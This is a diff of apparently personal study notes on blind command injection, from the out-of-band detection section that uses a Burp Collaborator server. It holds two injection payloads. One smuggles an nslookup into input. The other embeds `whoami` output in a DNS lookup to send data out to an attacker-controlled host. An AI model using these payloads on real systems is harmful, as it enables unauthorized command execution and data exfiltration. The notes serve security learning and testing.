OmarMiniesy/Notes/Security/Web Application Security/Command Injection.md

 ##### OAST

-* Blind injections can also be discovered using out of band techniques, such as performing a [[Domain Name System (DNS)]] lookup of a server we have control over, such as the [[Burp Suite]] collaborator server.
+Blind injections can also be discovered using out of band techniques, such as performing a [[Domain Name System (DNS)]] lookup of a server we have control over, such as the [[Burp Suite]] collaborator server.
 ```
 x||nslookup <burp-collab-payalod>||
 ```
-> We can get the collaborator payload by right clicking in the repeater and choosing insert collaborator payload.
+- We can get the collaborator payload by right clicking in the repeater and choosing insert collaborator payload.

-Then, we can observe the `nslookup` by checking the collaborator server logs to see the results of our injection.
+ - Then, we can observe the output of the `nslookup` command by checking the collaborator server logs to see the results of our injection.

-* We can append the data we need to extract as a subdomain of the collaborator server.
+We can append the data we need to extract as a subdomain of the collaborator server.
 ```
 x||nslookup `whoami`.<burp-collab-payload>||
 ```